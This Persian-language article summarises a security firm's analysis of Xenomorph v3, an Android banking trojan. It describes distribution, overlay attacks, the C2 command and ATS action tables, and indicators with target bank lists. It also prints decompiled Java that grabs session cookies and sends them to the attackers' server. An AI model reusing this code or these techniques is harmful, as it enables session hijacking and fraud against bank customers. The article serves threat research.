محققای ThreatFabric یه گزارشی در خصوص نسخه جدید بدافزار بانکی Xenomorph ارائه دادن و اعلام کردن که این بدافزار، خطرناکترین و پیشرفته ترین بدافزار بانکی اندرویدی هستش.
این بدافزار توسط گروه Hadoken Security Group توسعه داده شده و تقریبا معروفترین بدافزار این گروه هم هستش. بدافزار اولین بار در فوریه 2022 ، توسط محققین ThreatFabric کشف شد و طبق گفته این محققین، کل سال 2022 در حال رشد و توسعه بوده اما در کمپین های محدودی مورد استفاده قرار گرفته.
این کمپین های محدود توسط یه dropper بنام GymDrop ، که خود گروه توسعه داده بودن شروع شده و در ادامه توسط یه dropper دیگه بنام Zombinder توزیع شده. این کمپین های محدود و هدفمند با هدف تست و آزمایش بدافزار انجام شدن.
نسخه جدید این بدافزار قابلیت های زیادی به Xenomorph داده و بنابراین بدافزار این قابلیت داره که کل فرایند کلاهبرداری رو ، از آلودگی تا انتقال وجوه، بصورت اتوماتیک انجام بده و همین قابلیت ها ، این بدافزار رو تبدیل به خطرناکترین و پیشرفته ترین بدافزار بانکی اندرویدی کرده.
براساس نمونه هایی که محققین پیدا کردن، این بدافزار امکان سرقت از 400 موسسه و بانک از تمام قاره ها و همچنین چندین کیف پول ارزهای دیجتال رو داره. این تعداد نسبت به نسخه های قبلی 6 برابر شده.
همچنین محققا یه سایت کشف کردن که این بدافزار رو تبلیغ میکنه و نشون دهنده اینه که توسعه دهندگان بدافزار ،مانند توسعه دهندگان بدافزارهای Gustuff و SharkBot ، قصد راه اندازی یه سرویس MaaS و توزیع در مقیاس جهانی رو دارن.
توزیع:
محققا یسری نسخه آزمایشی از این بدافزار رو کشف کردن که از سرویس های میزبانی شخص ثالث بخصوص Discord CDN برای توزیع و مخفی نگه داشتن بدافزارهاشون سوء استفاده کردن.
دلایل استفاده از خدمات مشخصه ، اینا سرویس هایی هستن که بسیار رایج اند و توسط میلیونها نفر استفاده میشن و بنابراین قابل اعتماد به نظر میرسن. باز کردن حساب در این سرویس ها رایگانه و محدودیتی به لحاظ تعداد نداره. همچنین امکان اتصال دستگاه به این اکانتها هم ساده و رایج هستش. با این توصیفات ، احتمال اینکه یه محصول امنیتی اون رو مخرب شناسایی کنه کمه.
البته محققا معتقدند که این نمونه خاص ، در هیچ کمپینی مورد استفاده قرار نگرفته و احتمالا توسعه دهندگان برای اشتراک گذاری و نه برای توزیع از این سرویس استفاده کردن.
اولین نسخه بدافزار توسط GymDrop در فوریه 2022 منتشر شد. اما توسعه دهندگان در طول سال تغییراتی دادن، ابتدا به سمت BugDrop رفتن اما بعد یه مدتی از Zombinder استفاده کردن. نسخه سوم بدافزار توسط Zombinder ارائه شده. بدافزار بعنوان یه پلاگین در داخل یه برنامه قانونی مبدل ارز دیجیتال برای دانلود ارائه میشه.
نکته ای که وجود داره ، توسعه دهندگان Zombinder اعلام کردن که ارائه این سرویس رو متوقف میکنن و بنابراین این احتمال وجود داره که در توزیعهای بعدی از سرویس های دیگه ای استفاده بشه.
اهداف :
بدافزار از نسخه اولیه خودش ،روی جمع آوری اطلاعات قابل شناسایی (PII) مانند نام های کاربری و پسوردها از طریق overlay attack فعالیت میکنه. در این روش حمله، مهاجم یه پنجره بالا میاره و کاربران فک میکنن دارن با اون پنجره کار میکنن اما در حقیقت ، دارن کارایی که مهاجم میخواد رو انجام میدن.
نسخه های اولیه بدافزار روی اسپانیا، پرتغال ، ایتالیا متمرکز بود اما بعدا موسسات بلژیکی و کانادایی و یسری کیف پول ارزها دیجیتال رو هم بهش اضافه کردن.
نسخه جدید امکان فعالیت روی 400 بانک و موسسه مالی ، بهمراه کیف ارزهای دیجیتالی رو داره که نسبت به نسخه های قبلی 6 برابر شده.
ارائه خدمات این چنینی برای بدافزارهای بانکی اندرویدی که بصورت MaaS فعالیت میکنن رایج هستش و اغلب توسعه دهندگان برای بروز نگه داشتن این بخش ها اونارو برونسپاری میکنن و خیلی ها تو فرومهای هک چنین خدماتی رو ارائه میدن.
قابلیتهای نسخه جدید بدافزار:
اولین نسخه بدافزار Xenomorph در فوریه 2022 کشف شد که ویژگی های زیادی نداشت و مشخص بود که در حال توسعه بود. پس از یه مدت عدم فعالیت ، در ژوئن 2022 ، نسخه جدیدی از بدافزار منتشر شد. این نسخه جدید برای انعطاف پذیری و بروزرسانی ساده تر ، ماژولار شده بود و همچنین یه بازنگری در کل کدها هم انجام داده بودن. این نسخه احتمالا برای معرفی موتور زمان اجرای مجهز به Accessibility Services که برای شبیه سازی اقدامات ، برای جعل هویت قربانی اضافه شده بود ، ارائه شد.
در نسخه سوم بدافزار، توسعه دهدنگان با استفاده از این موتور ، پشتیبانی کامل از ATS framework رو فراهم کردن که توسط بازیگران بعنوان RUM engine شناخته میشه. لیست دستورات که در نسخه سه قابل پشتیبانی هستن در جدول زیر قابل مشاهده هستش ( پر رنگها دستورات جدید اضافه شده به نسخه 3 هستن) :
| Command | Description |
|---|---|
| app_list | Send List of installed apps |
| inj_enable | Enable injections |
| inj_disable | Disable Injections |
| inj_list | Not Implemented |
| inj_update | Request update of injections |
| fg_enable | Enable notification in Foreground |
| fg_disable | Disable notification in Foreground |
| notif_ic_enable | Enable Notification Intercept |
| notif_ic_disable | Disable Notification Intercept |
| notif_ic_list | Not Implemented |
| notif_ic_update | Not Implemented |
| sms_log | Log SMSs |
| sms_ic_enable | Enable SMS Intercept |
| sms_ic_disable | Disable SMS Intercept |
| socks_start | Start Socks server |
| socks_stop | Stop Socks server |
| sms_ic_list | Not Implemented |
| sms_ic_update | Not Implemented |
| app_kill | Kill Specified Application Process |
| app_delete | Not Implemented |
| app_clear_cache | Not Implemented |
| self_kill | Not Implemented |
| self_cleanup | Removes the malware itself |
| app_start | Start Specified Application |
| show_push | Show Push notification |
| cookies_handler | Obtain Cookies |
| send_sms | Send SMS |
| make_ussd | Run USSD Code |
| call_forward | Forward Call |
| execute_rum | Run ATS Module |
قابلیت ATS Framework :
ATS Framework یا Automated Transfer Systems یسری ویژگی هایی رو در اختیار مجرمین قرار میده که میتونن باهاش تراکنش جعلی روی دستگاه آلوده بسازن. این سیستمها بدون تعامل کاربر و از طریق اپراتور ،امکان گرفتن اطلاعات کاربری ، موجودی حساب ، ایجاد تراکنش، دریافت توکن های MFA و … رو فراهم میکنن.
این اسکریپتها بصورت فرمت JSON دریافت میشن و بعد پردازش ، بعنوان لیستی از عملیات که موتور روی دستگاه باید اجرا کنه ، تبدیل میشن. در زیر یه نمونه از این اسکریپتها رو مشاهده میکنید (یه جورایی مثله Nuclei و تمپلیتهاش هستن) :
|
1 2 3 4 5 6 7 8 9 |
{ "module": "<MODULE_NAME>", "version": 1, "parameters": [...], // LIST OF PARAMETERS "requires": [...], // LIST OF REQUIRED CONDITIONS "triggerConditions": [...], // LIST OF TRIGGER CONDITIONS "terminator": {...}, // IS TERMINATOR ENABLED "operations": [...] // LIST OF OPERATIONS TO BE EXECUTED (ATS) } |
به لطف چنین فریمورکهایی ،بدافزارها میتونن اطلاعات مورد نیازشون رو جمع آوری کنن و از اونا برای فعالیت های مجرمانه بعدی استفاده کنن.
موتور ATS مورد استفاده در بدافزار Xenomorph به لطف قابلیت اجرای اسکریپتهای مختلف و همچنین اجرا براساس اولویت و شرایط ، ویژه هستش. برای مثال در ادامه به اسکریپتی که برای استخراج MFA از authenticator Google مورد استفاده قرار میگره، پرداختن.
بانکها برای احراز هویت بجای استفاده از پیامک، رو به استفاده از برنامه های احراز هویت آوردن و بنابراین برای بدافزارهای بانکی مدرن ، این مهمه که بتونن این برنامه ها رو دور بزنن.
در Xenomorph ، توسعه دهندگان یه ماژول ATS برای این منظور توسعه دادن. شکل زیر ماژول جمع آوری کد رو از طریق برنامه های احراز هویت نشون میده.
این موتور به دلیل پشتیبانی از گزینه های قابل تنظیم از جمله عملگرهای منطقی، دست مجرمین رو باز میزاره تا برای شرایط مختلف بتونن سناریوهای مختلفی رو پیاده کنن.
اگه این شرایط برقرار بشه، بدافزار شروع به جمع آوری کدهایی که دارایی ساختار خاصی هستن میکنه ، که در مورد کدهای احراز هویت شامل دو گروه عددی مثله شکل زیر هستش:
این فقط قابلیت یه اسکریپت ATS هستش، جدول زیر لیست همه ATS های موجود رو نشون میده
| Action Code | Description |
|---|---|
| clickOnNode | Clicks on specified node |
| getRootNode | Get pointer to Root node |
| getParent | Get Parent of Specified node |
| getFirstNeighborsRespectively | Get nearest node |
| findAllowButton | Finds button to allow action |
| getText | Gets text of specified node |
| clickOnParent | Clicks on parent node |
| clickOnFirstClickable | Clicks on nearest clickable object |
| clickAllowButton | Clicks on allow button |
| clickCancelButton | Clicks on cancel button |
| CONTROL_MODULE_FINISH_SUCCESSFULLY | Communicate with control module a successful execution |
| CONTROL_MODULE_ABORT | Communicate with control module a failed execution |
| CONTROL_GO_HOME | Press HOME button |
| CONTROL_GO_BACK | Press BACK button twice |
| CONTROL_GO_BACK5 | Press BACK button 5 times |
| CONTROL_MODULE_RETURN | Communicate with control module a finished execution |
| DEBUG_LOG_CONTEXT | Log current context |
| DEBUG_LOG_WHOLE_CONTEXT | Log entire context |
| DEBUG_LOG_MODULE_REGISTERED_ACTIONS | Log RUM registered actions |
| DEBUG_LOG_CURRENT_DATA | Log data contained in current context |
| DEBUG_PRINT | Debug print function |
| setActionPassedThrough | Sets an existing action to be ignored by the engine |
| findNodesByParameters | Finds nodes on UI based on search parameters |
| findFirstNodeByParameters | Finds first node matching on UI based on search parameters |
| findNodesByClass | Finds node based on class name |
| findFirstNodeByClass | Finds first node based on class name |
| findNodesByViewId | Finds node based on ViewId |
| findFirstNodeByViewId | Finds first node based on ViewId |
| findFirstNodeByText | Finds node based on text |
| getNodeByIndex | Finds first node based on text |
| getFirstChildOfClass | Finds node which is a child of specified class |
| CONTROL_PUT_ACTION_RESULT | Store a bool indicating if the action was successful |
| sleepForMilliseconds | Sleep for specified number of milliseconds |
| CONTROL_SET_UNPROCESSED | Sets if there was an unprocessed event |
| CONTROL_CLEAR_UNPROCESSED | Clears unprocessed events |
| CONTROL_FLUSH_ALL_CONTEXT_DATA_ENTRIES | Clear all node entries |
| STATE_EVENT_CLEAR | Clear state events |
| CONTROL_RUN_MODULE_STRAIGHT | Run ATS module |
| CONTROL_GLOBAL_VALUE_SET_FROM_TEXT_DATA_ENTRY | Set Value in Shared Preferences from data entry |
| CONTROL_GLOBAL_VALUE_SET | Set Value in Shared Preferences |
| DATA_JOIN_TUPLE_LIST | Join lists of variables into tuple list |
| API_SEND_SIMPLE_STATE_WITH_OBJECT | Send data to C2 |
با وجود چنین قابلیتی ، ایجاد یه اسکریپت که بتونه بصورت خودکار موجودی بگیره و بعدش همه مراحل ایجاد یه تراکنش جعلی رو اتوماتیک انجام بده خیلی سخت نیست.
قابلیت سرقت کوکی ها:
نسخه سوم Xenomorph قابلیت سرقت کوکی رو هم داره. این ویژگی اولین بار توسط بدافزار S.O.V.A در سپتامبر 2021 معرفی شد و بعد از اون کم کم به سایر بدافزارهای بانکی از جمله SharkBot اضافه شد.
Session Cookie باعث میشن تا کاربر برای Sessionهایی که در مرورگرش بازه، نیاز به وارد کردن مجدد اطلاعات ورود نباشه. مهاجمی که به این Session Cookie ها دسترسی داره ، عملا میتونه به Sessionهایی که در مرورگر قربانی بازه دسترسی داشته باشه.
بدافزار Xenomorph مانند سایر بدافزارهای بانکی ، یه مرورگر با رابط جاواسکریپت فعال راه اندازی میکنه و از اون برای نمایش صفحه مورد نظر قربانی استفاده میکنه. با این روش بدافزار سعی میکنه کاربر رو فریب بده تا وارد سرویسی بشه که بدافزار میخواد کوکی های اونو استخراج کنه.
پس از ورود موفقیت آمیز کاربر، مرورگر کوکی رو از طریق Android CookieManager استخراج میکنه و اونو به سرور C2 ارسال میکنه. کد زیر بخشی از فرایند سرقت کوکی هستش:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
WebView webView0 = new WebView(this); this.wv = webView0; webView0.getSettings().setJavaScriptEnabled(true); this.wv.setWebViewClient(new WebViewClient() { @Override // android.webkit.WebViewClient public void onPageFinished(WebView webView0, String s) { String s1 = CookieManager.getInstance().getCookie(s); String[] arr_s = CookieManager.getInstance().getCookie(s).replace(";", "").split(" "); if(s1.contains("sessionid")) { try { JSONObject jSONObject0 = new JSONObject(); for(int v = 0; v < arr_s.length; ++v) { String[] arr_s1 = arr_s[v].split("="); jSONObject0.put(arr_s1[0], arr_s1[1]); new StringBuilder().append("cookie is = ").append(jSONObject0).toString(); } UtilGlobal.sendCookies(jSONObject0.toString()); } catch(Exception exception0) { UtilGlobal.sendCookies("cookiesGrabbingFailed"); new StringBuilder().append("Cookie Grabber Error: ").append(exception0.getMessage()).toString(); } return; } } }); this.wv.addJavascriptInterface(new WebAppInterface(this), "Android"); this.wv.loadUrl("$rstr[CURD]"); this.setContentView(this.wv); |
ضمائم گزارش:
Zombinder sample
| App name | Package name | SHA-256 |
|---|---|---|
| CoinCalc | com.samruston.flip | 15e3c87290957590dbaf4522645e92933b8f0187007468045a5bd102c47ea0f4 |
Xenomorph V3 Samples
| App name | Package name | SHA-256 |
|---|---|---|
| Play Protect | com.great.calm | 9ce2ad40f3998860ca1ab21d97ea7346bf9d26ff867fc69c4d005c477c67a899 |
| Play Protect | meritoriousness.mollah.presser | 88d3cb485f405a6cec9d14e9ee2865491855897bfc9a958c0e7c06485a074d02 |
Xenomorph V3 Servers
| C2 Server | Campaign |
|---|---|
| team[.]mi1kyway.tech | test samples |
| vldeolan[.]com | live campaigns |
| cofi[.]hk | live campaigns |
| dedeperesere[.]xyz | live campaigns |
| Injection Server | Campaign |
|---|---|
| inj.had0[.]live | test samples |
| jobviewer[.]co | live campaigns |
Xenomorph V3 Target List
Live Campaign
| PackageName | AppName |
|---|---|
| app.wizink.es | WiZink, tu banco senZillo |
| be.argenta.bankieren | Argenta Banking |
| be.axa.mobilebanking | Mobile Banking Service |
| be.belfius.directmobile.android | Belfius Mobile |
| ca.affinitycu.mobile | Affinity Mobile |
| ca.bnc.android | National Bank of Canada |
| ca.hsbc.hsbccanada | HSBC Canada |
| ca.manulife.MobileGBRS | Manulife Mobile |
| ca.mobile.explorer | CA Mobile |
| ca.motusbank.mapp | motusbank mobile banking |
| ca.pcfinancial.bank | PC Financial Mobile |
| ca.servus.mbanking | Servus Mobile Banking |
| ca.tangerine.clients.banking.app | Tangerine Mobile Banking |
| cgd.pt.caixadirectaparticulares | Caixadirecta |
| com.abanca.bm.pt | ABANCA – Portugal |
| com.atb.ATBMobile | ATB Personal – Mobile Banking |
| com.bankinter.launcher | Bankinter Móvil |
| com.bbva.bbvacontigo | BBVA Spain |
| com.bbva.mobile.pt | BBVA Portugal |
| com.bnpp.easybanking | Easy Banking App |
| com.cajasur.android | Cajasur |
| com.cibc.android.mobi | CIBC Mobile Banking® |
| com.coastcapitalsavings.dcu | Coast Capital Savings |
| com.db.pbc.mibanco | Mi Banco db |
| com.desjardins.mobile | Desjardins mobile services |
| com.eqbank.eqbank | EQ Bank Mobile Banking |
| com.exictos.mbanka.bic | Banco BIC, SA |
| com.grupocajamar.wefferent | Grupo Cajamar |
| com.imaginbank.app | imaginBank – Your mobile bank |
| com.indra.itecban.mobile.novobanco | NBapp Spain |
| com.indra.itecban.triodosbank.mobile.banki | – |
| com.ing.banking | ING Banking |
| com.kbc.mobile.android.phone.kbc | KBC Mobile |
| com.latuabancaperandroid | Intesa Sanpaolo Mobile |
| com.lynxspa.bancopopolare | YouApp |
| com.mediolanum | Banco Mediolanum España |
| com.meridian.android | Meridian Mobile Banking |
| com.pcfinancial.mobile | Simplii Financial |
| com.rbc.mobile.android | RBC Mobile |
| com.rsi | ruralvía |
| com.sella.BancaSella | Banca Sella |
| com.shaketh | Shakepay: Buy Bitcoin Canada |
| com.targoes_prod.bad | TARGOBANK – Banca a distancia |
| com.td | TD Canada |
| com.tecnocom.cajalaboral | Banca Móvil Laboral Kutxa |
| es.bancosantander.apps | Santander |
| es.caixagalicia.activamovil | ABANCA- Banca Móvil |
| es.caixaontinyent.caixaontinyentapp | Caixa Ontinyent |
| es.cecabank.ealia2103appstore | UniPay Unicaja |
| es.cm.android | Bankia |
| es.evobanco.bancamovil | EVO Banco móvil |
| es.ibercaja.ibercajaapp | Ibercaja |
| es.lacaixa.mobile.android.newwapicon | CaixaBank |
| es.liberbank.cajasturapp | Banca Digital Liberbank |
| es.openbank.mobile | Openbank – banca móvil |
| es.pibank.customers | Pibank |
| es.univia.unicajamovil | UnicajaMovil |
| it.bcc.iccrea.mycartabcc | myCartaBCC |
| it.bnl.apps.banking | BNL |
| it.carige | Carige Mobile |
| it.copergmps.rt.pf.android.sp.bmps | Banca MPS |
| it.creval.bancaperta | Bancaperta |
| it.nogood.container | UBI Banca |
| it.popso.SCRIGNOapp | SCRIGNOapp |
| posteitaliane.posteapp.appbpol | BancoPosta |
| posteitaliane.posteapp.apppostepay | Postepay |
| pt.bancobpi.mobile.fiabilizacao | BPI APP |
| pt.novobanco.nbapp | NB smart app |
| pt.santandertotta.mobileparticulares | Santander Particulares |
| pt.sibs.android.mbway | MB WAY |
| wit.android.bcpBankingApp.activoBank | ActivoBank |
| wit.android.bcpBankingApp.millennium | Millenniumbcp |
| www.ingdirect.nativeframe | ING España. Banca Móvil |
Test Samples
| PackageName | AppName |
|---|---|
| ae.almasraf.mobileapp | Al Masraf |
| air.app.scb.breeze.android.main.my.prod | Standard Chartered Mobile (MY) |
| alior.bankingapp.android | Usługi Bankowe |
| app.wizink.es | WiZink, tu banco senZillo |
| app.wizink.pt | Wizink, o teu banco fácil |
| ar.bapro | BIP Mobile |
| ar.com.redlink.custom | Banca Móvil Ciudad |
| ar.com.santander.rio.mbanking | Santander Argentina |
| ar.macro | Macro |
| at.erstebank.george | George Österreich |
| at.ing.diba.client.onlinebanking | ING Banking Austria |
| at.rsg.pfp | Mein ELBA-App |
| at.volksbank.volksbankmobile | Volksbank hausbanking |
| au.com.amp.myportfolio.android | My AMP |
| au.com.bankwest.mobile | Bankwest |
| au.com.commbank.commbiz.prod | CommBiz |
| au.com.cua.mb | CUA Mobile Banking |
| au.com.hsbc.hsbcaustralia | HSBC Australia |
| au.com.macquarie.banking | Macquarie Mobile Banking |
| au.com.mebank.banking | ME Bank |
| au.com.nab.mobile | NAB Mobile Banking |
| au.com.newcastlepermanent | NPBS Mobile Banking |
| au.com.rams.RAMS | myRAMS |
| au.com.suncorp.SuncorpBank | Suncorp Bank |
| au.com.suncorp.rsa.suncorpsecured | Suncorp Secured |
| au.com.ubank.internetbanking | UBank Mobile Banking |
| be.argenta.bankieren | Argenta Banking |
| be.axa.mobilebanking | Mobile Banking Service |
| be.belfius.directmobile.android | Belfius Mobile |
| br.com.intermedium | Inter: conta digital completa |
| br.com.original.bank | Banco Original |
| br.com.uol.ps.myaccount | PagBank: Banco, Conta digital, Cartão, Pix, CDB |
| ca.affinitycu.mobile | Affinity Mobile |
| ca.bnc.android | National Bank of Canada |
| ca.hsbc.hsbccanada | HSBC Canada |
| ca.manulife.MobileGBRS | Manulife Mobile |
| ca.mobile.explorer | CA Mobile |
| ca.motusbank.mapp | motusbank mobile banking |
| ca.pcfinancial.bank | PC Financial Mobile |
| ca.servus.mbanking | Servus Mobile Banking |
| ca.tangerine.clients.banking.app | Tangerine Mobile Banking |
| cgd.pt.caixadirectaparticulares | Caixadirecta |
| cl.android | Banco Falabella CMR |
| cl.bancochile.mbanking | Mi Banco de Chile |
| co.com.bbva.mb | BBVA Colombia |
| co.mona.android | Crypto.com – Buy Bitcoin Now |
| com.CIMB.OctoPH | CIMB Bank PH |
| com.CredemMobile | Credem |
| com.EurobankEFG | Eurobank Mobile App |
| com.IngDirectAndroid | ING France |
| com.MizrahiTefahot.nh | מזרחי טפחות – ניהול חשבון |
| com.NBQBank | NBQBANK |
| com.QIIB | QIIB Mobile |
| com.Version1 | PNB ONE |
| com.abanca.bancaempresas | ABANCA Empresas |
| com.abanca.bm.pt | ABANCA – Portugal |
| com.abnamro.nl.mobile.payments | ABN AMRO Mobiel Bankieren |
| com.acceltree.mtc.screens | Alawwal Mobile |
| com.aff.otpdirekt | OTP SmartBank |
| com.akbank.android.apps.akbank_direkt | Akbank |
| com.aktifbank.nkolay | N Kolay |
| com.albarakaapp | Albaraka Mobile Banking |
| com.alliance.AOPMobileApp | allianceonline Mobile |
| com.ally.MobileBanking | Ally Mobile |
| com.alrajhiretailapp | Al Rajhi Mobile |
| com.ambank.ambankonline | AmOnline |
| com.americanexpress.android.acctsvcs.us | Amex |
| com.anadolubank.android | Anadolubank Mobil |
| com.anz.android.gomoney | ANZ Australia |
| com.aol.mobile.aolapp | AOL – News, Mail & Video |
| com.arkea.android.application.cmb | Crédit Mutuel de Bretagne |
| com.atb.ATBMobile | ATB Personal – Mobile Banking |
| com.atb.businessmobile | ATB Business – Mobile Banking |
| com.att.myWireless | myAT&T |
| com.axabanque.fr | AXA Banque France |
| com.bancocajasocial.geolocation | Banco Caja Social Móvil |
| com.bancodebogota.bancamovil | Banco de Bogotá |
| com.bancomer.mbanking | BBVA México (Bancomer Móvil) |
| com.bancsabadell.wallet | Sabadell Wallet |
| com.bankaustria.android.olb | Bank Austria MobileBanking |
| com.bankia.wallet | Bankia Wallet |
| com.bankinter.bkwallet | Bankinter Wallet |
| com.bankinter.empresas | Bankinter Empresas |
| com.bankinter.launcher | Bankinter Móvil |
| com.bankinter.portugal.bmb | Bankinter Portugal |
| com.bankofqueensland.boq | BOQ Mobile |
| com.bawagpsk.bawagpsk | BAWAG PSK klar – Mobile Banking App |
| com.bbt.myfi | U by BB&T |
| com.bbva.GEMA | BBVA Empresas México |
| com.bbva.bbvacontigo | BBVA Spain |
| com.bbva.mobile.pt | BBVA Portugal |
| com.bbva.nxt_peru | BBVA Perú |
| com.bcp.bank.bcp | Banca Móvil BCP |
| com.bendigobank.mobile | Bendigo Bank |
| com.binance.dev | Binance – Buy & Sell Bitcoin Securely |
| com.bitpay.wallet | BitPay – Secure Bitcoin Wallet |
| com.bmo.mobile | BMO Mobile Banking |
| com.bnhp.payments.paymentsapp | bit ביט |
| com.bnpp.easybanking | Easy Banking App |
| com.botw.mobilebanking | Bank of the West Mobile |
| com.boursorama.android.clients | Boursorama Banque |
| com.bradesco | Bradesco |
| com.btcturk | BtcTurk Bitcoin Borsası |
| com.btcturk.pro | BtcTurk PRO – Bitcoin Al-Sat |
| com.caisseepargne.android.mobilebanking | Banque |
| com.cajaingenieros.android.bancamovil | Caja de Ingenieros Banca MÓVIL |
| com.cajasur.android | Cajasur |
| com.cbd.mobile | CBD |
| com.cbk.mobilebanking | CBK Mobile |
| com.cbq.CBMobile | CBQ Mobile |
| com.changelly.app | Changelly: Buy Bitcoin BTC & Fast Crypto Exchange |
| com.chase.sig.android | Chase Mobile |
| com.cibc.android.mobi | CIBC Mobile Banking® |
| com.cic_prod.bad | CIC |
| com.cimbmalaysia | CIMB Clicks Malaysia |
| com.citi.citimobile | Citi Mobile® |
| com.citibanamex.banamexmobile | Citibanamex Móvil |
| com.citibank.CitibankMY | Citibank MY |
| com.citizensbank.androidapp | Citizens Bank Mobile Banking |
| com.clairmail.fth | Fifth Third Mobile Banking |
| com.cm_prod.bad | Crédit Mutuel |
| com.coastcapitalsavings.dcu | Coast Capital Savings |
| com.coinbase.android | Coinbase – Buy & Sell Bitcoin. Crypto Wallet |
| com.comarch.mobile.banking.bgzbnpparibas.biznes | Mobile BiznesPl@net |
| com.comarch.security.mobilebanking | ING Business |
| com.commbank.netbank | CommBank |
| com.compasssavingsbank.mobile | Compass Savings Bank |
| com.danskebank.mobilebank3.dk | NY mobilbank DK – Danske Bank |
| com.db.mm.norisbank | norisbank App |
| com.db.mobilebanking | Doha Bank Mobile Banking |
| com.db.pbc.mibanco | Mi Banco db |
| com.db.pwcc.dbmobile | Deutsche Bank Mobile |
| com.denizbank.mobildeniz | MobilDeniz |
| com.desjardins.mobile | Desjardins mobile services |
| com.dhanlaxmi.dhansmart.mtc | Dhanlaxmi Bank Mobile Banking |
| com.dib.app | DIB MOBILE |
| com.discoverfinancial.mobile | Discover Mobile |
| com.easybank.easybank | easybank App |
| com.empik.empikapp | Empik |
| com.empik.empikfoto | Empik Foto |
| com.engage.pbb.pbengage2my.release | PB engage MY |
| com.enjin.mobile.wallet | Enjin: Bitcoin, Ethereum, Blockchain Crypto Wallet |
| com.eqbank.eqbank | EQ Bank Mobile Banking |
| com.etrade.mobilepro.activity | E*TRADE: Invest. Trade. Save. |
| com.exictos.mbanka.bic | Banco BIC, SA |
| com.fibabanka.Fibabanka.mobile | Fibabanka Mobile |
| com.fibabanka.mobile | Fibabanka Corporate Mobile |
| com.fibi.nativeapp | הבנק הבינלאומי |
| com.finansbank.mobile.cepsube | QNB Finansbank Mobile Banking |
| com.finanteq.finance.bgz | BNP Paribas GOMobile |
| com.finanteq.finance.ca | CA24 Mobile |
| com.firstbank.firstmobile | FirstMobile |
| com.fss.indus | IndusMobile |
| com.fullsix.android.labanquepostale.accountaccess | La Banque Postale |
| com.fusion.banking | Bank Australia app |
| com.fusion.beyondbank | Beyond Bank Australia |
| com.garanti.cepsubesi | Garanti BBVA Mobile |
| com.gemini.android.app | Gemini: Buy Bitcoin Instantly |
| com.getingroup.mobilebanking | Getin Mobile |
| com.gmowallet.mobilewallet | ビットコイン・暗号資産(仮想通貨)ウォレットアプリ GMOコイン|チャート・購入・レバレッジ取引 |
| com.greater.Greater | Greater Bank |
| com.grupoavaloc1.bancamovil | Banco de Occidente Móvil |
| com.grupocajamar.wefferent | Grupo Cajamar |
| com.hittechsexpertlimited.hitbtc | HitBTC – Bitcoin Trading and Crypto Exchange |
| com.icomvision.bsc.tbc | TBC Bank |
| com.ics.nl.icscards | ICS Creditcard |
| com.ideomobile.discount | Discount Bank |
| com.ideomobile.hapoalim | בנק הפועלים – ניהול החשבון |
| com.imaginbank.app | imaginBank – Your mobile bank |
| com.indra.itecban.mobile.novobanco | NBapp Spain |
| com.indra.itecban.triodosbank.mobile.banki | – |
| com.indra.itecban.triodosbank.mobile.banking | Triodos Bank. Banca Móvil |
| com.infonow.bofa | Bank of America Mobile Banking |
| com.infosys.alh | Al Hilal Mobile Banking App |
| com.infrasofttech.CentralBank | Cent Mobile |
| com.infrasofttech.MahaBank | Maha Mobile |
| com.ing.banking | ING Banking |
| com.ing.mobile | ING Bankieren |
| com.ingbanktr.ingmobil | ING Mobil |
| com.ininal.wallet | ininal Wallet |
| com.interswitchng.www | Fidelity Online Banking |
| com.intertech.mobilemoneytransfer.activity | fastPay |
| com.isbank.isyerim | Maximum İşyerim |
| com.isis_papyrus.hypo_pay_eyewdg | HYPO Mein ELBA-App |
| com.itau | Banco Itaú: Gerencie sua conta pelo celular |
| com.kasikorn.retail.mbanking.wap | K PLUS |
| com.kbc.mobile.android.phone.kbc | KBC Mobile |
| com.key.android | KeyBank Mobile |
| com.konylabs.HongLeongConnect | Hong Leong Connect Mobile Banking |
| com.konylabs.capitalone | Capital One® Mobile |
| com.konylabs.cbplpat | Citi Handlowy |
| com.kraken.trade | Pro: Advanced Bitcoin & Crypto Trading |
| com.kubi.kucoin | KuCoin: Bitcoin Exchange & Crypto Wallet |
| com.kutxabank.android | Kutxabank |
| com.kuveytturk.mobil | Kuveyt Türk |
| com.latuabancaperandroid | Intesa Sanpaolo Mobile |
| com.leumi.leumiwallet | לאומי |
| com.lumiwallet.android | Lumi Crypto and Bitcoin Wallet |
| com.lynxspa.bancopopolare | YouApp |
| com.magiclick.odeabank | Odeabank |
| com.mbanking.ajmanbank | Ajman Bank |
| com.mcom.firstcitizens | First Citizens Mobile Banking |
| com.mediolanum.android.fullbanca | Mediolanum |
| com.mediolanum | Banco Mediolanum España |
| com.meridian.android | Meridian Mobile Banking |
| com.mfoundry.mb.android.mb_136 | People’s United Bank Mobile |
| com.mobikwik_new | BHIM UPI, Money Transfer, Recharge & Bill Payment |
| com.mobileloft.alpha.droid | myAlpha Mobile |
| com.mobillium.papara | Papara |
| com.mootwin.natixis | My Savings |
| com.morganstanley.clientmobile.prod | Morgan Stanley Wealth Mgmt |
| com.msf.kbank.mobile | Kotak – 811 & Mobile Banking |
| com.mtb.mbanking.sc.retail.prod | M&T Mobile Banking |
| com.mycelium.wallet | Mycelium Bitcoin Wallet |
| com.navyfederal.android | Navy Federal Credit Union |
| com.ocbc.mobilemy | OCBC Malaysia Mobile Banking |
| com.ocito.cdn.activity.banquelaydernier | Banque Laydernier – Mobile |
| com.ocito.cdn.activity.creditdunord | Crédit du Nord pour Mobile |
| com.okinc.okcoin.intl | Okcoin – Buy & Trade Bitcoin, Ethereum, & Crypto |
| com.okinc.okex.gp | OKEx – Bitcoin/Crypto Trading Platform |
| com.oxigen.oxigenwallet | Bill Payment & Recharge,Wallet |
| com.paribu.app | Paribu |
| com.pcfinancial.mobile | Simplii Financial |
| com.plunien.poloniex | Poloniex Crypto Exchange |
| com.pnc.ecommerce.mobile | PNC Mobile |
| com.pozitron.iscep | İşCep – Mobile Banking |
| com.pozitron.qib | QIB Mobile |
| com.pttfinans | PTTBank |
| com.quoine.quoinex.light | Liquid by Quoineライト版(リキッドバイコイン) -ビットコインなどの仮想通貨取引所 |
| com.rak | RAKBANK Digital Banking |
| com.rbc.mobile.android | RBC Mobile |
| com.rsi.Colonya | Colonya Caixa Pollença |
| com.rsi | ruralvía |
| com.s4m | EI Bank |
| com.samba.mb | SambaMobile |
| com.samourai.wallet | Samourai Wallet |
| com.sbi.SBAnywhereCorporate | SBI Anywhere Corporate |
| com.sbi.SBIFreedomPlus | Yono Lite SBI – Mobile Banking |
| com.scb.ae.bmw | SC Mobile Banking (UAE) |
| com.schwab.mobile | Schwab Mobile |
